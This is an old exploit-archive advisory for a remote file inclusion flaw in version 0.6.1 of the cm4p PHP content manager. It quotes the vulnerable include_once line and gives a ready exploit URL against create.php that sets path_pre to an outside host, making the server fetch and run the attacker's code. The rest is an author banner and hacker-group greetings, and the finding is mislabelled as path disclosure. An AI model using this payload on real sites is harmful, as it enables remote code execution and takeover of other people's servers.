cm4p-rfi.txt
Posted on 23 April 2007
******************************************** *AuThor:Silitoad *************************** *emA!l:Silitoad[at]hotmail[dot]Com ********* *HoMePaGe: http://www.Arabian-FighterZ.com<http://www.arabian-fighterz.com/>* ******************************************** [Info] website: http://www.mariovaldez.net cms: cm4p Version: 0.6.1 Download: http://www.mariovaldez.net/software/cm_4p/files/cm4p_0.6.1.zip Problem: Include file bug: include_once ($path_pre . "cm/cm_anon.inc.php"); [Vuls] 1.Full path disclosure: [Exploit] http://target.com/cm4p_0.6.1/cm/create.php?path_pre=http://evilcode.txt? [Greetings] Greets To Linux_m,Str0ke,l1nuxm4,Sn1p8r,Sbitar,Op3runix,simple_clan,l33t_b3k3rz,the leo from Midt